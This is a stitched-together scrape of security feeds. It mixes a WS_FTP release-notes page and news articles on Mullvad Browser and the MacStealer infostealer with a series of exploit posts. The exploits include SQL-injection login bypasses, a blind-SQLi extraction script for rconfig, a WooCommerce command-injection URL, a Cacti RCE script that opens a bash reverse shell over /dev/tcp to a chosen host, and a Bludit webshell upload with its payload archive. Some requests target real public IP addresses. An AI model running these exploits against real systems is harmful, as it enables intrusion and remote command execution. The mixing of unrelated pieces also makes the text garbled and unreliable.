Roxy WI version 6.1.0.0 suffers from an improper authentication control vulnerability.

    # Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31125# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 105Origin: https://192.168.56.114Dnt: 1Referer: https://192.168.56.114/app/login.pySec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closealert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45

Roxy WI 6.1.0.0 Improper Authentication Control 

Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.

**2020.0..0 (8.7.0) Dec 15, 2020**

**2020.0.1 (8.7.1) Aug 30, 2021** **(updated)**

**2020.0.2 (8.7.2) April 22, 2022** **(updated)**

**2020.0.3 (8.7.3) Aug 1, 2022** **(updated)**

The WS\_FTP Server 2020.0.0 (8.7.0) release focused on security vulnerabilities and customer issues to ensure that all security updates were applied to provide users with a secure and quality product.

The following are the main security enhancements and bug fix highlights that were applied to the 2020 release:

*   Database passwords containing special characters are accepted
*   Updated third party components to versions that address known security vulnerabilities.
*   Log viewer filters are applied to exported log data
*   Email addresses of users with a top level domain longer than 5 characters are accepted by WS\_FTP Server
*   The WS\_FTP Server admin log on page renders correctly
*   The installation documentation was updated to include the following important information:  
    _Installing WS\_FTP Server on a domain controller is not supported_

For details of all of the fixed vulnerabilities and issues, see Fixed Issues.

The WS\_FTP Server UI and documentation were rebranded as _Progress WS\_FTP Server._

Support for WS\_FTP Web Server will be deprecated in future releases.

**Fixed Issues in 2020.0.0 (8.7.0)**

The following issues were fixed in WS\_FTP Server 2020.0.0 (8.7.0).

ID

Category

Fixed Issue

6007

Documentation

The installation documentation was updated to include the following important information:  
_Installing WS\_FTP Server on a domain controller is not supported._

6208, 6219, 6222, 6256

Install, SSH, Database

There is support for special characters in database passwords during installation and database configuration.

6301

Security

The AngularJS version used for the WTM and AHT modules was upgraded to version 1.8 to prevent vulnerabilities.

6302

Security

WS\_FTP Server's cookies now have secure and HTTP only attributes.

6325

Security

The prototype.js version used in WS\_FTP Server was upgraded to version 1.7.3 to prevent vulnerabilities.

6342, 6345, 6346

Security,  
WTM

Fixed a directory traversal vulnerability on WS\_FTP Server's WTM interface.

6348

Logging Server

Filters that were applied to the log viewer are now also applied to the .XML export option.

6350

Users

Email addresses of users with a top level domain longer than 5 characters are now accepted by WS\_FTP Server.

6351

Web Admin

The WS\_FTP Server admin log on and home pages now render correctly.

6352

Security,  
Server Admin

Updates were applied to the LogServer login page to protect against cross site scripting (xss).

6356

Security

Error messages were sanitized to prevent the disclosure of potentially sensitive data.

6383

Security

The FTP server (and SSH server) do not reveal the product version to unauthenticated users.

6419

Core

Sessions time out after the specified time, the default is 600 seconds, or when a client disconnects.

**Fixed Issues in 2020.0.1 (8.7.1)**

The following issues were fixed in WS\_FTP Server 2020.0.1 (8.7.1).

ID

Category

Fixed Issue

12244

Database

Fixed an issue which caused an error connecting to SSH/FTP after database migration from PostgreSQL to MSSQL.

12769

Web Transfer Module

Web Transfer Module now successfully opens as part of application pool creation.

**Fixed Issues in 2020.0.2 (8.7.2)**

The following issues were fixed in WS\_FTP Server 2020.0.2 (8.7.2).

ID

Category

Fixed Issue

12339

SRVR/Security

The PostgreSQL version used in WS\_FTP Server was upgraded from version 10.14 to 10.20 to prevent vulnerabilities.

**Fixed Issues in 2020.0.3 (8.7.3)**

The following issues were fixed in WS\_FTP Server 2020.0.3 (8.7.3).

ID

Category

Fixed Issue

6315, 6332, 12240, 15175, 15178, 15179, 15184, 15185

Server, Security

Addressed Cross-Site Request Forgery (CSRF) issues in WS\_FTP Server Administrative interface.

15168, 15181, 15182, 15183, 15186, 15187, 15188

Server, Security

Addressed cross-site scripting (XSS) issues in WS\_FTP Server Administrative interface.

**Known Issues**

This section details known issues and workarounds in all WS\_FTP Server 2020.0 (8.7) releases.

ID

Category

Known Issue Description

15343

Install

A repair installation issue with WS\_FTP Server 2020.0.0 or later, prevents users from upgrading to the next available version.

**Note**: This issue only affects all WS\_FTP Server 2020 releases (2020.0.0, 2020.0.1, and 2020.0.2) where a repair has been applied to an upgraded installation.  
For upgrade information and next steps, see this knowledge base article.

**System Requirements**

These requirements apply to the supporting environment and operating system where you install WS\_FTP Server.

**Software Requirements**

**Supported Operating Systems for WS\_FTP Server**

The Operating Systems are supported for the following WS\_FTP Server configurations:

*   Standalone
*   Failover cluster using Microsoft Clustering Services
*   Failover cluster using Microsoft Network Load Balancing

**Operating System**

*   Windows Server 2019 Standard/Datacenter (standalone only)
*   Windows Server 2016 Standard/Datacenter (standalone only)
*   Windows Server 2012 R2 Standard/Datacenter (standalone only)

**Windows Server Components Activated Automatically**

The WS\_FTP Server installer automatically activates certain components in your Windows Server installation. This is necessary because after installation Windows Server does not turn on non-core operating system components. However, before installing WS\_FTP Server, you should ensure these changes conform to your organization’s security policies.

When you install WS\_FTP Server, the install activates the following Windows Server roles:

*   ISAPI Extensions
*   Windows Authentication
*   ASP

**Supported Web Browsers**

The following browsers are supported for WS\_FTP Server Manager and the Web Transfer and Ad-Hoc Transfer client interfaces:

*   Chrome
*   Mozilla Firefox
*   Microsoft Edge

**Database Platform**

WS\_FTP Server requires one of the database platforms listed in the following table.

The default database platform is PostgreSQL, however during installation, you can select Microsoft SQL Server as your database for configuration data.

*   PostgreSQL 10.20
*   Microsoft SQL Server 2017 Enterprise/Standard
*   Microsoft SQL Server 2016 Enterprise/Standard

**Framework and Accessibility**

WS\_FTP Server requires the Microsoft .NET Framework and other Microsoft packages for scripting and software accessibility. Microsoft .NET Framework 4.6 is included in the installation program.

**Hardware**

**Minimum requirements**

*   4-core server-class CPU (For example: Intel Xeon 4-core 2+GHz)
*   4 GB RAM
*   250 GB or larger free disk space, depending on estimated data to be stored
*   100/1000 MB Ethernet interface (for TCP/IP traffic)

**Ad Hoc Transfer Plug-in Requirements**

The following software must be installed on the machine on which you install the Ad Hoc Transfer Plug-in for Outlook.

*   Microsoft Outlook 2016, 2013, or 2010
*   Supported on Windows Operating Systems only.

**Note**: If you are running the installer live (not doing a silent install), the installer automatically installs the Microsoft Visual Studio redistributable programs. You do not need to download anything from Microsoft. If running a silent install, you must download and install these redistributable programs before running the install. See the Requirements in the Silent Install section.

**Note**: For silent installation instructions for the Ad Hoc Transfer Plug-in for Outlook, see Silent install of the Ad Hoc Transfer Plug-in for Outlook .

**Upgrading**

Upgrading to the latest version of WS\_FTP Server ensures that you have access to the latest features, fixes, security updates, and usability improvements.

WS\_FTP Server 2020.0.0 (8.7.0) supports direct upgrades from WS\_FTP Server 2017 Plus (8.5) and later. For more information, see Upgrade Paths.

**Upgrading information and considerations****Latest features and improvements**

For the most up-to-date information about the latest supported features and improvements, see What's New.

**Hardware Requirements**

Review the current WS\_FTP Server System Requirements.

**Activation code**

The activation code is automatically applied when you run the WS\_FTP Server installer to upgrade.

*   Your upgrade activation code is embedded in the installer file.
*   The activation code is also stored in the section of the Progress Community.
*   The activation code differs from your serial number. The code begins with your serial number and contains an additional eight characters.

**Support for older WS\_FTP Server Versions**

For information about support for previous versions of WS\_FTP Server, see the Product Lifecycle page on the Progress Community website. Customers running EOL or soon to be EOL versions should upgrade to WS\_FTP Server 2020.

**Upgrade Paths**

To upgrade from an earlier version of WS\_FTP Server to WS\_FTP Server 2020, you must download the installer file.

1.  Login to the Progress Community.
2.  Select .
3.  Locate and download your product. Your activation code is embedded in the download file, and is automatically applied during installation.

**Upgrade paths**

WS\_FTP Server 2020 supports direct upgrade installations from the following versions:

*   WS\_FTP Server 2018 (8.6)
*   WS\_FTP Server 2017 Plus (8.5)

**Note**: The upgrade paths are valid only on supported Operating Systems. For more information, see WS\_FTP Server System Requirements.

For detailed installation and configuration instructions, or activating a new or upgraded license, see the WS\_FTP Server Installation and Configuration Guide.

**Note**: If you upgrade from a version earlier than 2020, the default installation folders do not change. For example, the WS\_FTP Server installation folder will be C:\Program Files (x86)\Ipswitch\WS_FTP Server.

**Copyright Notice**

© 2022 Progress Software Corporation and/or one of its subsidiaries or affiliates. All rights reserved.

These materials and all Progress® software products are copyrighted and all rights are reserved by Progress Software Corporation. The information in these materials is subject to change without notice, and Progress Software Corporation assumes no responsibility for any errors that may appear therein. The references in these materials to specific platforms supported are subject to change.

Chef, Chef (and design), Chef Infra, Code Can (and design), Compliance at Velocity, Corticon, DataDirect (and design), DataDirect Cloud, DataDirect Connect, DataDirect Connect64, DataDirect XML Converters, DataDirect XQuery, DataRPM, Defrag This, Deliver More Than Expected, DevReach (and design), Icenium, Inspec, Ipswitch, iMacros, Kendo UI, Kinvey, MessageWay, MOVEit, NativeChat, NativeScript, OpenEdge, Powered by Chef, Powered by Progress, Progress, Progress Software Developers Network, SequeLink, Sitefinity (and Design), Sitefinity, Sitefinity (and design), SpeedScript, Stylus Studio, Stylized Design (Arrow/3D Box logo), Styleized Design (C Chef logo), Stylized Design of Samurai, TeamPulse, Telerik, Telerik (and design), Test Studio, WebSpeed, WhatsConfigured, WhatsConnected, WhatsUp, and WS\_FTP are registered trademarks of Progress Software Corporation or one of its affiliates or subsidiaries in the U.S. and/or other countries.

Analytics360, AppServer, BusinessEdge, Chef Automate, Chef Compliance, Chef Desktop, Chef Habitat, Chef WorkStation, Corticon.js, Corticon Rules, Data Access, DataDirect Autonomous REST Connector, DataDirect Spy, DevCraft, Fiddler, Fiddler Everywhere, FiddlerCap, FiddlerCore, FiddlerScript, Hybrid Data Pipeline, iMail, JustAssembly, JustDecompile, JustMock, KendoReact, NativeScript Sidekick, OpenAccess, PASOE, Pro2, ProDataSet, Progress Results, Progress Software, ProVision, PSE Pro, Push Jobs, SafeSpaceVR, Sitefinity Cloud, Sitefinity CMS, Sitefinity Digital Experience Cloud, Sitefinity Feather, Sitefinity Insight, Sitefinity Thunder, SmartBrowser, SmartComponent, SmartDataBrowser, SmartDataObjects, SmartDataView, SmartDialog, SmartFolder, SmartFrame, SmartObjects, SmartPanel, SmartQuery, SmartViewer, SmartWindow, Supermarket, SupportLink, Unite UX, and WebClient are trademarks or service marks of Progress Software Corporation and/or its subsidiaries or affiliates in the U.S. and other countries. Java is a registered trademark of Oracle and/or its affiliates. Any other marks contained herein may be trademarks of their respective owners.

This document was published on 10 August 2022 at 13:25

CVE-2022-27665: What's New in WS_FTP Server 2020.0.0 (8.7.0)

By Waqas
Mullvad VPN and the Tor Project Join Forces to Launch Mullvad Browser, a Privacy-Focused Web Browser.
This is a post from HackRead.com Read the original post: Mullvad VPN and Tor Project Release Mullvad Browser

Good news for those seeking online privacy and anonymity as Mullvad Browser is now available for free download.

Mullvad VPN and the **Tor Project** have partnered to launch the Mullvad Browser, a new privacy-focused web browser. The browser has been developed to offer users a secure browsing experience and to minimize tracking and fingerprinting.

Mullvad browser is designed to be used with Mullvad VPN, a trustworthy VPN, to provide even greater privacy and security.

The Tor Project, the team behind the popular **Tor browser**, is a nonprofit organization that aims to defend online privacy and advance human rights by creating and deploying free, open-source anonymity and privacy technologies.

In a **press release**, Jan Jonsson, CEO of Mullvad VPN said, “The Tor Project is the best in the field of privacy-focused browsers. That’s why we reached out to them. We also share their values of human rights and online privacy. The Mullvad Browser is all about providing more privacy alternatives to reach as many people as possible and make life harder for those who collect data from you.”

For your information, Mullvad VPN was founded in 2009 and is widely considered to be one of the most secure and privacy-focused VPN services available today.

The company is based in Sweden and offers a secure, private, and anonymous VPN service that allows users to browse the internet without being tracked or monitored.

Mullvad VPN uses advanced encryption technology to protect user data and offers a no-logging policy to ensure that user activities are not tracked or recorded. Now, the service is also designed to work seamlessly with the Tor network, providing an additional layer of privacy and security for users.

The Mullvad browser is available for free and **can be downloaded** on Windows, MacOS, and Linux platforms.

“We want to free the internet from mass surveillance and a VPN alone is not enough to achieve privacy. From our perspective, there has been a gap in the market for those who want to run a privacy-focused browser as good as the Tor Project’s but with a VPN instead of the Tor Network,” Jonsson said.

For your information, another option that offers VPN along with Tor browser integration is **Brave browser**.

1.  Tor and Its 10 Best Alternatives
2.  Mozilla VPN – Firefox private network VPN
3.  Download the official Tor browser on Android
4.  ProtonVPN launches Chrome and Firefox extensions

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Mullvad VPN and Tor Project Release Mullvad Browser

Categories: Apple
Categories: News
Tags: MacStealer

Tags:  mac infostealer

Tags:  information stealer

Tags:  Apple

Tags:  Thomas Reed

Tags:  iCloud Keychain

MacStealer could be an infamous stealer in the making, but right now, it needs improvement, according to Malwarebytes expert.



(Read more...)




The post New macOS malware steals sensitive info, including a user's entire Keychain database appeared first on Malwarebytes Labs.

A new macOS malware—called MacStealer—that is capable of stealing various files, cryptocurrency wallets, and details stored in specific browsers like Firefox, Chrome, and Brave, was discovered by security researchers from Uptycs, a cybersecurity company specializing in cloud security. It can also extract the base64-encoded form of the database of Keychain, Apple's password manager. Users of macOS Catalina (10.5) and versions dependent on Intel M1 and M2 are affected by this malware.

And while MacStealer appears to be _the_ mac malware to watch, it is pretty rudimentary, according to Thomas Reed, Malwarebytes' director of core technology. "There is no persistence method, and it relies on the user opening the app," he adds, considering the foreseeable features the developer wants to add to MacStealer in the future.

MacStealer uses channels in Telegram as its command-and-control (C2) center. The malware has been promoted on a dark web forum since the beginning of March. According to the developers, it's still in the early beta stage, thus lacking a builder and panel. These are also why the developers distribute MacStealer as a malware-as-a-service (MaaS), selling at a low price of $100 and promising more advanced features in the future.

MacStealer arrives to target macOS systems as an unsigned disk image (.DMG) file. Users are manipulated to download and execute this file onto their systems. Once achieved, a bogus password prompts users in an attempt to steal their real password. MacStealer then saves the password in the affected system's temporary folder (TMP).

The malware then proceeds to collect and save the following also within the TMP folder:

*   Account passwords, browser cookies, and stored credit card details in Firefox, Chrome, and Brave
*   Cryptocurrency wallets (Binance, Coinomi, Exodus, Keplr Wallet, Martian Wallet, MetaMask, Phantom, Tron, Trust Wallet)
*   Keychain database in its encoded (base64)form
*   Keychain password in text format
*   Various files (.TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .PPT, .PPTX, .JPG, .PNG, .CVS, .BMP, .MP3, .ZIP, .RAR, .PY, .DB)
*   System information in text form

MacStealer also compresses everything it stole in a ZIP file and sends it to remote C&C servers for the threat actor to collect later. At the same time, a summary version of the information it stole is sent to pre-configured Telegram channels, alerting the threat actor that new stolen data is available for download.

  
A data summary of what has been stolen by MacStealer. The threat actors receive this on their personal Telegram bot. (Source: Uptycs)

MacStealer being an unsigned DMG file is also a barrier for anyone, especially beginners, attempting to run the program on a modern mac, said Malwarebytes' Reed. "Its attempt at phishing for login passwords is not very convincing and would probably only fool a novice user. But such a user is exactly the type who would have trouble opening it."

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

New macOS malware steals sensitive info, including a user's entire Keychain database

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Judging Management System 1.0 SQL Injection

EQ Enterprise Management System version 2.2.0 suffers from a remote SQL injection vulnerability.

    Exploit Title: EQ Enterprise management system v2.2.0 - SQL InjectionDate: 2022.12.7Exploit Author: TLFVendor Homepage: https://www.yiquantech.com/pc/about.htmlSoftware Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/Version: EQ v1.5.31 to v2.2.0Tested on: windows 10CVE : CVE-2022-45297 POC:POST /Account/Login HTTP/1.1 Host: 121.8.146.131 User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 118 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg Origin: http://121.8.146.131Referer: http://121.8.146.131/Account/Login X-Requested-With: XMLHttpRequest Accept-Encoding: gzipRememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27

EQ Enterprise Management System 2.2.0 SQL Injection

rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)# Exploit Author: azhen# Date: 10/12/2022# Vendor Homepage: https://www.rconfig.com/# Software Link: https://www.rconfig.com/# Vendor: rConfig# Version: <= v3.9.7# Tested against Server Host: Linux# CVE: CVE-2022-45030import requestsimport sysimport urllib3urllib3.disable_warnings()s = requests.Session()# sys.argv.append("192.168.10.150") #Enter the hostnameif len(sys.argv) != 2:    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")    sys.exit(1)host=sys.argv[1] #Enter the hostnamedef get_data(host):    print("[+] Get db data...")    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"    query_exp = "database()"    result_data = ""    for i in range(1, 100):        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)        # print(res.text)        a = chr(int(res.text[6:10]) - 1000)        if a == '\x00':            break        result_data += a                print(result_data)        print("[+] Database name: {}".format(result_data))    '''    output:    [+] Logging in...    [+] Get db data...    r    rc    rco    rcon    rconf    rconfi    rconfig    rconfigd    rconfigdb    [+] Database name: rconfigdb            '''def login(host):    print("[+] Logging in...")    url = "https://"+host+":443/lib/crud/userprocess.php"    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}        data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin    response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)    get_data(host)login(host)

rconfig 3.9.7 SQL Injection

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

    # Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id);   94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');     92: ⇓ function save($post_id, $post)       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));           92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

    # Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit:    def __init__(self, url, proxy=None, rs_host="",rs_port=""):        self.url = url         self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)        self.rs_host = rs_host        self.rs_port = rs_port    def exploit(self):        # cacti local ip from the url for the X-Forwarded-For header        local_cacti_ip  = self.url.split("//")[1].split("/")[0]            headers = {            'X-Forwarded-For': f'{local_cacti_ip}'        }                revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"        import base64        b64_revshell = base64.b64encode(revshell.encode()).decode()        payload = f";echo {b64_revshell} | base64 -d | bash -"        payload = urllib.parse.quote(payload)        urls = []                # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)        for host_id in range(1,100):            for local_data_ids in range(1,100):                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")                        for url in urls:            r = self.session.get(url,headers=headers)            print(f"{r.status_code} - {r.text}" )        pass    def random_user_agent(self):        ua_list = [            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",        ]        return random.choice(ua_list)def parse_args():    import argparse        argparser = argparse.ArgumentParser()    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)    return argparser.parse_args()def main() -> None:    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL     args = parse_args()    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)    e.exploit()if __name__ == "__main__":    main()

Cacti 1.2.22 Remote Command Execution

Bludit version 3-14-1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.bludit.com/# Version : 3-14-1# Tested on: windows 11 wampserver | Kali linux# Category: WebApp# Google Dork: intext:'2022 Powered by Bludit'# Date: 8.12.2022######## Description ##########  Step 1 : Archive as a zip your webshell (example: payload.zip)#  Step 2 : Login admin account and download 'UploadPlugin'#  Step 3 : Go to UploadPlugin section#  Step 4 : Upload your zip#  Step 5 : target/bl-plugins/[your_payload]######### Proof of Concept ########==============> START REQUEST <========================================POST /admin/plugin/uploadplugin HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264Content-Length: 1820Origin: https://036e-88-235-222-210.eu.ngrok.ioDnt: 1Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadpluginUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="tokenCSRF"b6487f985b68f2ac2c2d79b4428dda44696d6231-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="pluginorthemes"plugins-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="zip_file"; filename="a.zip"Content-Type: application/zipPK    †eˆU               a/PK   ”fˆUÆ  ª)¢  Ä      a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @Vêº­!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtOÌ¤Òœ.×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ  „Œ&Âd<ó`÷+œN—’y¼ÁRLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“j±u\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þÇ¸0yÕU¥H"ÕÕÿI  IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç  Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ïe8©ô*Ô¾"ý¡@Ó2+ëÂ`÷kC57j©'Î"m ã®ho¹ xŸô Û;’œcçzÙQË·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ  ØIÏ²òÖ`Ð:%F½$A"t;buOMr4Ýè~–eãÎ™åØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~tÂ6á¾,…ÅèçO´ÇÆ×Î£v²±ãÿbÃ‘Ú’‘Ug[;pq›eÓÜÅØÿéJË}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK?    †eˆU             $       €íA    a/          þš®,Ù þš®,Ù€ø¨j.ÙPK?   ”fˆUÆ  ª)¢  Ä    $        €¤    a/a.php          ¤eÝ-Ù ÷C-Ù bj.ÙPK      ­   ç    -----------------------------308003478615795926433430552264Content-Disposition: form-data; name="submit"Upload-----------------------------308003478615795926433430552264--==============> END REQUEST <========================================## WEB SHELL UPLOADED!==============> START RESPONSE <========================================HTTP/2 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:01:43 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTNgrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4Pragma: no-cacheServer: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: Bludit....==============> END RESPONSE <========================================# REQUEST THE WEB SHELL==============> START REQUEST <========================================GET /bl-plugins/a/a.php?cmd=whoami HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: 